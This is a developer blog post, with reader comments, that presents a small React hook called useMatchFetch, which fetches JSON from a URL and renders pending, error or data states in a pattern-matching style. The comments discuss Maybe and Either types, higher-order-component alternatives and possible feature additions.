birthdays.find_equal_to(my_birthday) { |x,y| x == y }
Which is not only longer and uglier than the original with closures, but is far too specific to be of any general use. At this point you may as well hardcode the block into the find_equal_to method (renamed for clarity). Sure, you can still customize the block, but you've lost 99% of the utility of the find method, so why bother when you can probably write a handful of these functions to take care of all the functionality your program needs.
find_equal_to
Earlier I mentioned decoupling the operations on a collection from the operations on its individual members. This is the ruby iterator paradigm. However, it's of critical importance to understand that ruby blocks allow decoupling to occur anywhere—not just between collections and their members. Any method can take a block as its last parameter, and can yield to that block whenever it chooses. Iterators are just the most common use of blocks in ruby, but they are far from being their only use.
In general blocks allow on-the-fly specialization of methods. Without closures a block would be nothing more than an anonymous function, so you could specialize the code of the method but not the data. With closures all your local variables come along for the ride, so your custom code has an infinite amount of context within which to work. I would argue that customizing on the data is the more useful half of the equation since algorithms tend to be general whereas data is unique to each application..
⇒.
5. Zool.
Any species of South American humming birds of the genus Clytolaema..
© Webster 1913.
Ru"by, a.
Ruby-colored; red; as, ruby lips.
Ru"by, v. t. [imp. & p. p. Rubied (?); p. pr. & vb. n. Rubying.]
To make red; to redden.
Pope.
Log in or registerto write something here or to contact authors. | http://everything2.com/title/Ruby | CC-MAIN-2014-35 | refinedweb | 2,112 | 62.48 |
How to know the current core while being compiled for PSoC 6 Dual Core?JoYa_4324706 Apr 19, 2020 1:21 PM
Hi,
I'm trying to understand how to determine the core that is currently being compiled while defining the proper macros for each core. I can see from the device header file with something like:
#if ((defined(__GNUC__) && (__ARM_ARCH == 6) && (__ARM_ARCH_6M__ == 1)) || \ (defined(__ICCARM__) && (__CORE__ == __ARM6M__)) || \ (defined(__ARMCC_VERSION) && (__TARGET_ARCH_THUMB == 3)) || \ (defined(__ghs__) && defined(__CORE_CORTEXM0PLUS__)))
to determine which core header file to include (e.g., core_cm0plus.h or core_cm4.h).
Since I'm using ARMCC, is there any way to understand how __TARGET_ARCH_THUMB is defined to know which core the PSoC Creator is currently compiling?
Thanks!
1. Re: How to know the current core while being compiled for PSoC 6 Dual Core?NoriakiT_91 Apr 19, 2020 5:52 PM (in response to JoYa_4324706)
I created an example project with two interrupts for M0 and M4 as follows.
And confirmed the generated source "cyfitter_sysint_cfg.h" at the interrupt configuration.
/* ARM CM0+ */ #if (((__CORTEX_M == 0) && (CY_CORE_ID == 0))) #define SysInt_M0__INTC_ASSIGNED 1u extern const cy_stc_sysint_t SysInt_M0_cfg; #endif /* ((__CORTEX_M == 0) && (CY_CORE_ID == 0)) */ /* ARM CM4 */ #if (((__CORTEX_M == 4) && (CY_CORE_ID == 0))) #define SysInt_M4__INTC_ASSIGNED 1u extern const cy_stc_sysint_t SysInt_M4_cfg; #endif /* ((__CORTEX_M == 4) && (CY_CORE_ID == 0)) */
It seems that the __CORTEX_M macro is used to specify the current core.
I don't know what is the CY_CORE_ID indicating.
Regards,
Noriaki
2. Re: How to know the current core while being compiled for PSoC 6 Dual Core?JoYa_4324706 Apr 21, 2020 7:25 AM (in response to NoriakiT_91)
Hi NoriakiT_91,
Thanks for the response. Yes I can understand that __CORTEX_M is defined and it is defined in either core_cm0plus.h or core_cm4.h. But however, I would still like to know how it is included in device header file under the #if statement mentioned previously. Specifically, how (defined(__ARMCC_VERSION) && (__TARGET_ARCH_THUMB == 3)) is defined in the source code.
3. Re: How to know the current core while being compiled for PSoC 6 Dual Core?NoriakiT_91 Apr 21, 2020 7:03 PM (in response to JoYa_4324706)1 of 1 people found this helpful
These pre-defined MACROs are declared by the ARM compiler. Please refer following on-line document.
ARM Compiler v5.06 for µVision armcc User Guide : 9.156 Predefined macros
Regards,
Noriaki | https://community.cypress.com/thread/53992 | CC-MAIN-2020-40 | refinedweb | 381 | 56.55 |
What's New in XPath 2.0What's New in XPath 2.0.
Also unlike XPath 1.0 node-sets (and sets in general), sequences may contain duplicates. For example, we can modify our expression above slightly:
(/foo/bar, /foo, /foo/bar)
This sequence consists of the
bar element(s), followed
by the
foo element(s), followed again by the same
bar element(s). In XPath 1.0, it was impossible to
construct such a collection, because, by definition, node-sets may not
contain the same node more than once.
In XPath 1.0, if you wanted to process a collection of nodes, you had to deal with node-sets. In XPath 2.0, the concept of the node-set has been generalized and extended. As we've seen, sequences may contain simple-typed values as well as nodes. We've also seen that sequences differ from node-sets in that they are ordered and may contain duplicates. The question naturally arises: how can you do away with node-sets without breaking XPath?
Indeed, XPath 1.0 node-sets were unordered. However, in XPath's most common context, XSLT, the nodes within the node-set are always processed in some order. The default order used to process node-sets was document order (since there is a document order that is always defined for all nodes). In XSLT 2.0, the default order used to process a node collection (i.e. sequence) is not necessarily document order but, rather, the order of the sequence. To maintain backward compatibility with XPath 1.0, path expressions (and other 1.0 expressions such as union expressions) are defined to always return in document order. Specifically, whenever "/" is used in the immediate expression, you can expect the result to be in document order. In addition, duplicates are automatically removed from the result. XPath 2.0 is thus able to emulate node-sets in a sequence-only world.
If you didn't follow all of that, don't worry. You may not have even realized before now that XPath 1.0 node-sets were unordered. It's mostly for the benefit of specification writers who like to reassure ourselves that everything is consistent and well-defined. Just rest assured that sequences are in fact ordered and path expressions pretty much behave the way they used to.
In addition to introducing many new datatypes and functions, XPath 2.0 introduces a number of new keyword-based operators, some of which we'll look at below.
Perhaps the most powerful new operator in XPath 2.0 for processing
sequences is the
for expression. It enables iteration
over sequences, returning a new value for each member in the argument
sequence. This is similar to what can be done with
xsl:for-each, but it is different in that it is an actual
expression that returns a sequence which can, in turn, be processed as
such.
Consider the following example, which returns a sequence of simple-typed values, each consisting of the total cost of each item in a purchase order.
for $x in /order/item return $x/price * $x/quantity
We could then get the total cost of the order by using the
sum() function.
sum(for $x in /order/item return $x/price * $x/quantity)
Cases such as these are much easier to solve using sequences in
XPath 2.0 than they were in XSLT/XPath 1.0. Without sequences, this
problem is much harder to solve and usually involves constructing a
temporary "result tree fragment" and then using the
node-set() extension function.
Among the more powerful (and oft-requested) constructs added to XPath 2.0 is the conditional expression. Here's an example that's included in the XPath 2.0 working draft.
if ($widget1/unit-cost < $widget2/unit-cost) then $widget1 else $widget2
The XPath 1.0 equals operator (
=) was one of the more
powerful aspects of the language. It was powerful because it could
compare node-sets. Consider the following expression.
/students/student/name = "Fred"
In XPath 1.0, this expression returns true if any student name is equal to "Fred". This might be called existential quantification because it tests for the existence of a member satisfying some condition. XPath 2.0 preserves this functionality but also provides a more explicit way of testing:
some $x in /students/student/name satisfies $x = "Fred"
This formulation is more powerful because you can replace the
$x = "Fred" with any comparison you want, not just
equality comparisons. Also, XPath 1.0 does not provide a way for
testing to see if every student is named "Fred". XPath 2.0
introduces this ability to do universal quantification, using a
similar syntax to the above.
every $x in /students/student/name satisfies $x = "Fred"
In XPath 1.0, the only real set operator was the union operator
(
|). This meant that it was very awkward to determine
whether a given node was in a given node-set. For example, to
determine whether the node
$x is included in the
/foo/bar node-set, we'd have to write something like
/foo/bar[generate-id(.)=generate-id($x)]
or like
count(/foo/bar)=count(/foo/bar | $x)
XPath 2.0's introduction of the
intersect operator
alleviates some of the pain. Instead of going through the above
gyrations, we can simply write
$x intersect /foo/bar
XPath 2.0 also introduces the
except operator, which
can be very handy when we need to select all of a given node-set,
except for certain nodes. In XPath 1.0, if we wanted to, for example,
select all attributes except for the one with a given
namespace-qualified name, we'd have to write
@*[not(namespace-uri()='' and local-name()='foo')]
or
@*[not(generate-id(.)=generate-id(../@exc:foo)]
Once again, XPath 2.0 comes to our rescue with the following pleasant alternative:
@* except @exc:foo
If you take a peek at the XPath 2.0 spec, you'll see that I've left
out a lot of keywords, including things like
cast,
treat,
assert, and
instance
of. These are important parts of the language, but their
importance partially depends on which context you're using XPath 2.0
in. If you will be using XPath in the context of XSLT 2.0, you may not
need to use these every day. You certainly will want to use them in
certain cases (for example, when casting a string to a date), but you
won't be required to use them. In the context of XQuery 1.0, however,
you may need to become intimately familiar with them.
The reason is that XQuery 1.0 is designed to be a statically typed language. Query analysis and optimization are aided by knowledge about what datatypes query expressions will be returning before the query is ever executed. This is only possible if the user explicitly specifies what type each of her expressions are to return. The other advantage of this approach is that errors can be caught early, thereby helping to enforce the correctness of queries.
There is certainly a tradeoff between usability and type safety. To serve the needs of both communities (sometimes artificially divided into the document-oriented and data-oriented worlds), XPath 2.0 provides a means by which the context can decide where it would like to stand in this tradeoff. Effectively, XPath 2.0 can be parameterized by its context. This may sound like a recipe for non-interoperability. However, it is important to identify the guiding principle behind the approach that has been taken. The principle is that any XPath 2.0 expression that does not first return an error will always return the same result as in another context. Thus, while an expression in one context may produce an error and not in another, it will never produce two different expression results. In other words, you always get either a right answer or an error. There is never more than one right answer.
The intended upshot for XSLT users is that they won't have to worry about most of this stuff, most of the time. A given XPath 2.0 expression may throw an "exception" in the XQuery context, but the same expression results in a silently invoked fallback conversion when in the context of XSLT.
It will likely become clear that XPath 2.0 represents a very significant upgrade to XPath 1.0. Its growth has been driven both by the demands of the XPath 1.0 user community, as well as the requirements for XQuery 1.0. Even if you don't agree with the entire outcome, it's hard to deny that it represents a remarkable collaboration. With any luck, it will also represent a very powerful, standard tool for several user communities.
XML.com Copyright © 1998-2006 O'Reilly Media, Inc. | http://www.xml.com/lpt/a/940 | crawl-001 | refinedweb | 1,477 | 58.48 |
Opened 8 years ago
Closed 8 years ago
#6282 release blocker: regression closed fixed (fixed)
Trial tracebacks are not properly trimmed since 12.3.0
Description
Due to the porting effort of trial to Python 3, tracebacks in the trial reporter are no longer properly trimming tracebacks:
from twisted.trial import unittest class Test(unittest.TestCase): def test_it(self): raise Exception()
yields:
[..] [ERROR] Traceback (most recent call last): File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 138, in maybeDeferred result = f(*args, **kw) File "/usr/lib/python2.7/dist-packages/twisted/internet/_utilspy3.py", line 41, in runWithWarningsSuppressed reraise(exc_info[1], exc_info[2]) File "/usr/lib/python2.7/dist-packages/twisted/internet/_utilspy3.py", line 37, in runWithWarningsSuppressed result = f(*a, **kw) File "/home/ralphm/work/wokkel/trunk/q.py", line 6, in test_it raise Exception() exceptions.Exception: [..]
This is due to importing
runWithWarningsSuppressed from
_utilspy3 instead of
util and an additional frame there. This makes the frames not being trimmed by
Reporter._trimFrames.
Related tickets: #6033 and #6235.
Change History (15)
comment:1 Changed 8 years ago by
comment:2 Changed 8 years ago by
comment:3 Changed 8 years ago by
comment:4 Changed 8 years ago by
Nice catch, fix ready to review.
comment:5 Changed 8 years ago by
comment:6 Changed 8 years ago by
comment:7 Changed 8 years ago by
Can you comment on why the branch changes the assertions made in
test_hiddenException? It seems like that's a general improvement (?) in behavior, rather than a fix for a regression.
comment:8 Changed 8 years ago by
comment:9 Changed 8 years ago by
comment:10 Changed 8 years ago by
comment:11 Changed 8 years ago by
- There are a number of missing docstrings.
TestAsynchronousFail. (It would be nice to add them to the other methods of
TracebackHandlingthat got touched as well.
- The docstring for
test_exceptionisn't clear. The test it is running is synchronous (just raises an exception). I think you mean a test using
twisted.trial.unittest.TestCasewhich *can* handle asynchronous tests.
- The comment in
_trimFramesneeds to be updated and turned into a proper docstring.
- What is going to happen in
_trimFramesis the traceback doesn't look as expected? We should detect this and do something, as well as test this case. (Doing this may have caught the regression.
Please address the above issues and re-submit.
Note for archaeologists:
SynchronousTestCaseuses
twisted.python.util.runWithWarningsSuppressed(which doesn't support deferreds), and
TestCaseuses
twisted.internet.utils.runWithWarningsSuppresedwhich does).
comment:12 Changed 8 years ago by
I've fixed 1-3. I don't think we can do anything for 4, as there are too many different cases that can happen. We already had a test which ought to have caught the regression.
comment:13 Changed 8 years ago by
A couple of last things:
- As discussed on IRC, we should document that
_trimFramesgets called with tracebacks other than the ones we expect (primarly when using testcase not from trial).
_trimFramesshould use
C{}and
L{}for code and references, and have
@paramand
@return
getErrorFramesshould have
@paramand
@return.
Please address the above issues and merge.
(In [36988]) Branching to 'async-trim-frames-6282' | https://twistedmatrix.com/trac/ticket/6282 | CC-MAIN-2021-31 | refinedweb | 534 | 58.69 |
How I built my first open source library
Last week I published my first open source library, QuickTicker. It’s a Swift library that lets you create simple ticker animations using one line of code. The result looks like this:
In this post, I’d like to talk about this project and cover:
- Why I created this library
- How I built it (the coding part)
- Final details (example project, unit tests, README.md, Cocoapods)
- Summary of major points and general advice (aka TLDR)
Why open source?
Starting with the obvious question: I decided to build this library because this is functionality I end up incorporating into most of my projects anyway, so I figured I might as well make it a bit more generic and package it up into a library that can easily be added to any project, instead of copy-pasting code between projects.
Building this library was also an opportunity to practice thinking in terms of APIs and building modular code that hides implementation details. I also had to use generics, which I hadn't used in any of my previous projects!
What does it do?
When I started this project, my goal was to build a simple library that lets you animate labels similar to the gif above. I ended up adding a few additional features over the course of the project, although the core concept is still the same. Here is the list of features I ended up with:
- Start an animation using just one line of code
- Familiar syntax to anyone who’s used UIView’s animate methods
- Accepts any Numeric value as end value, you don’t have to convert or typecast
- It works even if there is text mixed in with numbers in the same label. Text remains intact while the digits get animated 👍
- Completion handler lets you safely queue-up actions following the animation
- You can optionally specify animation curves and decimal points for the label
- Works on both UILabel and UITextField (I intend to expand this later)
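For instance, the one-line call from the first bullet looks roughly like this (the exact parameter labels are my reading of the library and may differ slightly between versions):

```swift
import UIKit

let scoreLabel = UILabel()

// Animate the label's numeric value up to 250 over 2 seconds,
// then run the completion closure
QuickTicker.animate(label: scoreLabel, toEndValue: 250, duration: 2) {
    print("Ticker finished")
}
```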
Label animation, the main purpose of this library, is something I'd learned about from a YouTube video by Brian Voong. In the video, Brian talks about CADisplayLink and how you can use it to animate text in UILabels to create counters and other similar effects. There is some boilerplate code required to get CADisplayLink working (including selectors and @objc methods), and that's where I think this library can be useful.
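To see why that is worth wrapping, here is roughly the boilerplate a hand-rolled CADisplayLink counter needs. This sketch is my own illustration, not the library's internals:

```swift
import UIKit

class CounterLabel: UILabel {
    private var displayLink: CADisplayLink?
    private var startTime: CFTimeInterval = 0
    private let duration: CFTimeInterval = 2
    private let endValue: Double = 250

    func startCounting() {
        startTime = CACurrentMediaTime()
        // The target/selector pair is the reason an @objc method is required
        displayLink = CADisplayLink(target: self, selector: #selector(handleUpdate))
        displayLink?.add(to: .main, forMode: .default)
    }

    @objc private func handleUpdate() {
        let progress = min((CACurrentMediaTime() - startTime) / duration, 1)
        text = String(Int(progress * endValue))
        if progress >= 1 {
            displayLink?.invalidate() // stop the link, or it fires every frame forever
            displayLink = nil
        }
    }
}
```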
Before I go on, I’d like to mention a talk given at Swift & Fika 2018 by Daniel Kennett about API design. During that talk, Daniel spoke about the API boundary, which is the line between the code of the API and the code of the user. As an API designer, you get to choose where this boundary goes, and this decision can have great ramifications.
The closer the boundary gets to the user code, the more work you have to do as an API designer. In return, the API becomes much easier for the user to implement (think Crashlytics with their ridiculously simple install process). Daniel showed an image to convey that point.
On the other hand, if you decide to place the boundary much closer to your code, you end up having to write less code, but you give the user much more work to do. In return, they usually end up having more control over the API. Daniel offered the example of Spotify Metadata.
I don’t think either approach is wrong. It all depends on what you’re trying to accomplish with your API. In my case with QuickTicker, my goal was to make it as simple as possible for the user to get started, ideally a one-line function call. So I was interested in making something more similar to the first image (Crashlytics).
How I built it (the technical part)
The early versions of the library did not use a dedicated type. Instead, I built it as an extension on the UILabel type (you can still see it in the early commits on GitHub if you're curious what it looked like). So you would call the API using dot syntax directly on your label, something like this:
let someLabel = UILabel()
someLabel.startTicker(duration: 2, endValue: 250)
There were a few things I didn’t like about this approach. I wasn’t a big fan of extending the entire UILabel type, as I didn’t want to pollute the namespace for all UILabels for the user, when they probably only needed to animate one or two labels. This approach also meant that I couldn’t extend the same functionality to other types like UITextField without duplicating all my code.
As an aside, during this early experiment with type extension, I learned that it is actually possible to add stored properties to type extensions in Swift. To do this, you'd have to define a computed property backed by an associated object, then access that object using an association key, which is a unique pointer to that association. The end result looks like this:
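A minimal sketch of that pattern (the property and key names here are my own illustration):

```swift
import UIKit
import ObjectiveC

// The address of this variable acts as the unique association key
private var tickerValueKey: UInt8 = 0

extension UILabel {
    var currentTickerValue: Double {
        get {
            return objc_getAssociatedObject(self, &tickerValueKey) as? Double ?? 0
        }
        set {
            objc_setAssociatedObject(self, &tickerValueKey, newValue,
                                     .OBJC_ASSOCIATION_RETAIN_NONATOMIC)
        }
    }
}
```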
Sure the syntax is ugly, and very “unswifty”, but it gets the job done, and lets you do something that is otherwise not possible in Swift. I think it’s really cool!
Anyway, back to the main topic 😁 As I mentioned earlier, I ended up scrapping this type extension approach for my API and went with a dedicated type. Two types, to be precise: one publicly available, one internal (not visible to the user).
Now you might be wondering why I didn’t go with a protocol, as it may seem like a good solution here. The problem is that I needed to store properties (you’ll find out why when I discuss the implementation below), and protocols don’t allow that (as far as I know!). They only let you add computed properties, and the trick I mentioned above with associated objects doesn’t work on protocols.
This brings us to my custom types. One of them is a public class named QuickTicker, which contains three class methods. The first method contains all possible parameters, while the other two are convenience methods that call into the main one with some default values. The syntax for these methods is inspired by UIView’s animate methods, which will be familiar to many users.
I could have provided default values to all parameters on the main method instead of writing 3 methods, but that didn’t give me the desired level of granularity when testing out auto-complete options. Another advantage to writing separate methods is you get to specify the auto-complete tooltip text for each one, explaining the default values to the user (e.g. 2 second duration). The auto-complete tooltip by the way is added via /// (3 forward slashes) above the method.
I used the class keyword instead of static for these methods, because I wanted to give the user the option to override them if they wanted to. This class also contains an Options enum. The options include 3 animation curves, as well as a decimalPoints case with an associated value denoting the number of decimals. This options array is a nice way to future-proof the API, as it lets me safely add further options down the line without breaking existing users’ code.
The main method accepts two generic parameters, one for the end value, which could be any Numeric value, and one for the animated label, which (for now) could be a UILabel or a UITextField. It looks like this:
It took me a while to figure out how I could create a function that accepts any Numeric value in a manner that is transparent to the user (thinking of the API boundary here). After some research online, I ended up using this answer on StackOverflow. This answer was posted before the Numeric protocol was made official in Swift, so at first I tried to adapt the answer to the existing Numeric protocol in the language, but after several unsuccessful attempts I ended up creating a NumericValue protocol that worked out beautifully (if you know of a way to make this work with Numeric, I would love to know how!)
Next we have the internal QTObject class. This class is necessary because I want to store several values over the course of the animation. Most notably, a weak reference to the animated label, the end value, a completion handler, a reference to the ongoing CADisplayLink (in order to stop it), and other options.
This object has an interesting method called getStartingValue(from: animationLabel):
As I mentioned in the list of features, QuickTicker updates the digits in your label while leaving the text intact. In other words, if you feed it a UILabel with the text “Temperature: 13F”, only the 13 part will get animated. This contributes to placing the boundary closer to the user’s code (less work for the user, no need to worry about mixing text with digits, but more code in the API to handle different scenarios).
To achieve this, the method above works like this:
- Try to convert to Double (using Double’s failable initializer)
- If it succeeds, return the digit (there is no text in the label)
- If it fails (there is text in the label), then find out where the digit starts and ends within the text
- Convert the value behind that start…end range to Double, that’s your starting value (the rest is either text, or a second digit, but we’re only concerned with the first digit we find)
To accomplish the above, I make use of another method called getFirstAndLastDigitIndexes. This one is pretty big, so I’m not gonna paste it in the article (you can see it here), but essentially what it does is define an NSCharacterSet with decimalDigits plus “.” then loop over the text looking for any matching characters (while accounting for edge cases, like a “.” in the middle of text)
Moving on to the QTObject initializer, when this gets called (by the class methods in QuickTicker), and once all the properties are initialized (including the starting value mentioned above), the CADisplayLink gets added to the default mode run loop, thereby starting the animation.
Small note regarding run loops: I intend to switch to common mode run loop in my next release, as I just learned that default mode can get blocked by touch events (i.e. scrolling your finger across the screen).
The CADisplayLink is tied to the device refresh rate, and is guaranteed to call its selector (the handleUpdate method in our case) on every screen refresh (every 16.7ms on a 60hz device); this gives you the entire 16.7ms duration to execute that method. Generally speaking, if you have CPU intensive code and wish to take advantage of that entire 16.7ms duration it’s better to use a CADisplayLink than a Timer, since timers can fire up slightly ahead or behind their intended time, thereby giving you less time to execute your code.
Next up is handleUpdateFor:
On every frame update, the handleUpdate method gets called. This method will check the elapsed time since the animation has started, and will calculate the current value for the label based on:
- The percentage of elapsed time / full duration
- Animation curve stated by the user (default is linear)
- End value stated by the user
- Number of decimals stated by the user
This is the crux of how the label animation works. Every frame update, you calculate how much time has passed since the animation has started, compare that against the full duration of the animation, and update the label accordingly. If we reached max duration, the displayLink is invalidated, and the completion handler is called.
For example, let’s say you wanted to animate a label from 0 to 40 over the course of 2 seconds. After 0.5 second has elapsed, you are 25% into the animation. With a linear curve, that means the label must show 25% of 40, i.e. 10 at that point in time.
There are a few interesting methods called over the course of the above process. First up is
getValueFromPercentage:
This will return a value based on the curve stated by the user. The easeIn curve is easy to calculate, since the percentage is a range from 0–1, so it’s just a matter of raising that percentage to the power of 2.8 (an arbitrary number I chose through trial and error to get a nice curve). To get the inverse curve (easeOut), I subtract the percentage from 1 before raising it to the power of 2.8, then subtract from 1 again.
The next method I wish to explore is updateLabel:
This will apply the desired number of decimal places to the calculated value before updating the label. The user can request a specific number of decimal places, such as 5 zeroes. If they don’t specify anything, the number will be inferred from the requested end value (e.g. if you specify 157.83 as the animation end value, then 2 decimal places will be maintained throughout the animation.
By default, Swift will discard extra zeroes after the decimal point. So if you enter something like
let x = 0.983010000 it will be converted to
0.98301 and we wouldn’t be able to respect the desired decimal places. To get around this, we call a function called
padValueWithDecimalsIfNeeded that looks like this:
This method does the following:
- Infer the number of decimal places from the calculated value (at that point in the animation)
- Compare it against the requested number of decimals
- If we are short (i.e. Swift discarded extra zeroes), then we pad it out to match the requested number
The second method used inside updateLabel is updateDigitsWhileKeepingText, which ensures that only the digits in the label get animated; the rest of the text stays intact. (just as we did in the beginning to infer the starting value)
This pretty much covers all the major parts of how the library works. There’s a total of 2 classes and 2 protocols, but I placed all of them in a single QuickTicker.swift file to make installation easier (just drag & drop one file). I like it when libraries let you do that (e.g. SwiftyJSON)
Example project
I decided to create an example project to showcase the library. This can be useful to generate some screenshots for the readme, and also to demonstrate to the user how the API calls work with some examples.
I personally find example apps really useful. For instance, when I implemented Google’s Cloud Firestore realtime database in one of my projects, the example helped me out a lot, especially to get acquainted with the API calls. I kept repeatedly referring back to the example app while working on my project to check how certain things are done.
For QuickTicker, I ended up building a single-page app with some sliders to let the user experiment with the different settings, as well as some pre-set counters at the bottom. It looks like this:
Some lessons learned while building the example app:
- If you intend to create a Cocoapod (more on that below), don’t build an example app manually. Let Cocoapods create it for you, then change it as you please. You’ll thank me later! 😃
- Use UIFont.monospacedDigitSystemFont for animated labels to prevent wobbling during the animation (especially when combining text with digits)
Unit Tests
This was an interesting one. I have limited experience writing unit tests; it’s definitely an area I need to work on 😄
When I started writing tests for this library, I quickly learned two things:
- In your tests file, you need to add a @testable keyword before your import statement in order to access internal classes
- You cannot access any private or fileprivate methods from your tests, even with @testable
The second one was pretty big for me. At that point, all of the classes and methods I had written were private except for the 3 class methods that I exposed to the user. I wanted to expose only the bare minimum so I wouldn’t pollute the user’s namespace with meaningless things like QTObject.
But in order to test the methods inside QTObject, I had to remove the private restriction, including the initializer for QTObject. I added a comment to the initializer, alerting the user not to call it directly and to use the class methods instead. And later on, I found out that since this is an internal class, if you install QuickTicker via Cocoapods, you can’t access it directly anyway. Perfect!
Here are the tests I wrote if you’re curious. Not comprehensive by any means, but still serviceable I think.
How to build a README.md
In the same excellent Swift & Fika 2018 conference I mentioned earlier, Roy Marmelstein gave a talk about open source in which he emphasized the importance of having a good readme page for your project on Github.
A good readme starts by explaining what the library is, and what you can do with it. Hopefully it’s something that’s usually hard but is easy with this library. Roy recommends creating a custom logo, and adding screenshots and especially gifs if applicable to your library (i.e. if it’s UI-related).
Other important sections include installation instructions and requirements, as well as an example project.
I started with a readme template, then I used these repos for inspiration:
Cocoapods
Next up was Cocoapods. I have used Cocoapods extensively in my projects before, but never actually created one. The process ended up being surprisingly straightforward.
To create the Cocoapod I followed tutsplus’ tutorial, along with Cocoapod’s own guides on their website.
One advice I’d like to reiterate here, is if you’re planning to include an example project in your library, let Cocoapods create the initial version (along with the test files), then modify it as you please. I had created the project myself, and then when I built the Cocoapod I ended with a second project, so I had to manually move files around from the old project to the new one. It’s a bit of a hassle.
Conclusion
I think I’ve covered all the major steps I went through while building this library! This was a fun weekend project, and I certainly learned a lot while doing it. To summarize some of the important points + some general advice:
- If there is a certain functionality that you keep adding to your projects over and over, consider packaging it up into an open source library
- Open source helps you build modular code and think in terms of APIs
- Before you start, consider where you want to place the API boundary
- If you place the boundary close to the user’s code (like I did with QuickTicker), expect to do more work on your side
- Try to future-proof your design, and plan for additive changes in the future as opposed to breaking user’s code in future updates (e.g. I added an options array that I can safely expand without breaking any existing code)
- If you intend to add an example project, and you wish to create a Cocoapod, let Cocoapods create the project + tests file for you
- Including an example project helps you generate screenshot (if applicable), and it helps introduce the users to your API
- Don’t forget about Unit Tests! Libraries with no tests get a lower CocoaPods Quality score
- And finally, having a good README.md file can be vital for the success of your library!
Hopefully, this article has inspired you to create your own open source library and share it with the world! Thanks for reading!
If you have any questions or suggestions, please leave a comment or tweet @BesherMaleh
You can find QuickTicker here.
If you’re curious, here are a couple of my apps that use this library | https://medium.com/@almalehdev/how-i-built-my-first-open-source-library-97d8bb2cc254 | CC-MAIN-2021-25 | refinedweb | 3,355 | 57.1 |
#include <Puma/CTree.h>
Base class for tree nodes representing lists.
List properties.
Constructor.
Add a list property.
Add a son.
Get the number of list entries.
Get the n-th list entry.
Get the list properties.
Get the index of the given son, or -1 if not found.
Insert a son before another son.
Insert a son at the given index.
Get a pointer to this CT_List.
Reimplemented from Puma::CTree.
Prepend a son.
Remove a son.
Remove the son at the given index.
Replace a son.
Reimplemented from Puma::CTree.
Replace the son at the given index.
Get the n-th son.
Reimplemented from Puma::CTree.
Reimplemented in Puma::CT_PrivateName.
Get the number of sons.
Implements Puma::CTree.
Reimplemented in Puma::CT_PrivateName, and Puma::CT_GnuLocalLabelStmt. | https://puma.aspectc.org/manual/html/classPuma_1_1CT__List.html | CC-MAIN-2021-39 | refinedweb | 127 | 66.1 |
Challenge Accepted!
code for
useMatchFetch down below.
import React from "react"; import { useMatchFetch } from "./effects/useMatchFetch"; export const Example = () => { const render = useMatchFetch(""); return render({ pending: () => <div>Loading</div>, error: err => <div>{err.toString()}</div>, data: data => <pre>{JSON.stringify(data, null, 2)}</pre> }); };
Watch my Live Stream
Want to see my process on how I created this? Watch me on Twitch!
useMatchFetch
I actually really like this. I think I might end up using this in a few places.
import { useState, useEffect } from "react"; const render = data => match => data.pending ? match.pending() : data.error ? match.error(data.error) : data.data ? match.data(data.data) : null // prettier-ignore export const useMatchFetch = url => { const [data, setData] = useState({ pending: true }); useEffect(() => { fetch(url) .then(response => response.json()) .then(data => setData({ data, pending: false })) .catch(error => setData({ error, pending: false })); }, [url]); return render(data); };
End
Follow me on Twitter @joelnet
Discussion (46)
I really think this is such a cool DEV use-case: Taking a tweet and expanding on, replying to and generally going deeper on the idea.
I also think a browser extension which could add a button like this to Twitter would be kind of awesome if anyone wants to build that 😄
Announcing off-platform "Share to DEV" functionality
Ben Halpern ・ Apr 26 '19 ・ 3 min read
We actually have an existing Twitter extension we haven't touched in a while but would definitely welcome this added functionality if anyone wants to make a PR (along with some other needed updates 😬)
Bringing dev.to headlines to your Twitter browsing experience.
DevTwitter Chrome Extension
Bringing dev.to headlines to your Twitter browsing experience.
Installing
Go to The Chrome Store to download the extension.
To access development releases, simply download or clone this code and load as an unpacked extension.
Unpacked Extension
hamburger menu > More Tools > Extensionsin the menu.
Load unpacked extension...and select the
chrome-extensionfolder.
Features
Future features
Twitter is a great way to connect and collaborate with other developers, and it would be fun to build in features that did that. The dev.to team will be thinking of ways to do this, but contributions are super welcome.
It is important…
Anyway, sorry to go on a tangent, this just made me happy. 🙂
I like this too. If someone has created a tweet, there's already some interest in that subject. I liked this tweet in particular because I kept thinking about it a few hours later.
Better integration would be awesome!
Heh, I've done that a couple of times, about git and about starting Node projects. I like the spark that a tweet can form in your mind and send you down a rabbit hole following ideas and writing code and posts in response.
Absolutely!
The fastest way to get me to do something is to tell me it can't be done!
I, too, want pattern matching in javascript and i also want Maybes and Eithers.
Same. You can use Maybes and Eithers today with a package import. The barrier is getting people familiar with them. Right now there's a lot of push back against them just because of familiarity bias.
If the language adopted them as native though, people would jump on board.
People are silly like that.
I think so too. Rust has them, they are called Option and Result. I secretly want Rust to become more popular so people can learn about them and how useful they are, and also start using them in other languages (and by other i mean javascript)
Interestingly, Rust has started to become more popular in Web Land as a language for writing WASM modules, in part because of the strong support from the Rust team themselves. See developer.mozilla.org/en-US/docs/W...
I like this one dev.to/_gdelgado/type-safe-error-h...
Currently im working on trying to reduce all the friction that happens when a language doesn’t support it more natively, hopefully have a post up with samples in the next month or so :)
You could try Z.
dev.to/kayis/pattern-match-your-ja...
Z looks interesting for sure. It's a little limited though. But it would work fine for this use case.
Glorious! I love the idea.
I'm not a super big fan of hooks, I still prefer HOC, so for those who are interested, here is a similar alternative I am testing out.
Alternatively, a HOC would work just as well, and be decoupled.
HOCs are another great way to solve this. Great examples!
I think it would be nice to have a
refetchaction so that the request can be remade even to the same url.
Also I think it would be nice to be able to distinguish then between the initial fetch, and future updates.
Also im debating with myself if I like the separate callbacks for each case, or if I would prefer being given the loading, data and error props together, and then do a more imperative approach with conditions. It seems more flexible.
In that case I would make the
renderfunction separately available, instead of wrapping it around the
data
Something along the lines of the react-apollo
graphqlHOC and
Querycomponent etc, but then for REST.
All great features! Submit a pull request ;)
Anyway, here it is; written in the train, so apologies for any typos ;-)
gist.github.com/patroza/4488f8fa2b...
Would love to, but where to? Where the codes at? :)
(Maybe im blind)
There's no repo for it. It was just a live stream demo :)
Nice write up! :)
Reminds me of these posts using daggy from fantasy-land
medium.com/javascript-inside/slayi...
datarockets.com/blog/javascript-pa...
nice little library that wraps it up
github.com/devex-web-frontend/remo...
One of the reasons, I decided not to make this an npm package. I figured something was already out there. I thought it would be fun to show the process.
Looks like those other libs have the same idea. I always love seeing an article with
daggy!
daggyis actually a perfect use case for this.
Cheers!
🍻
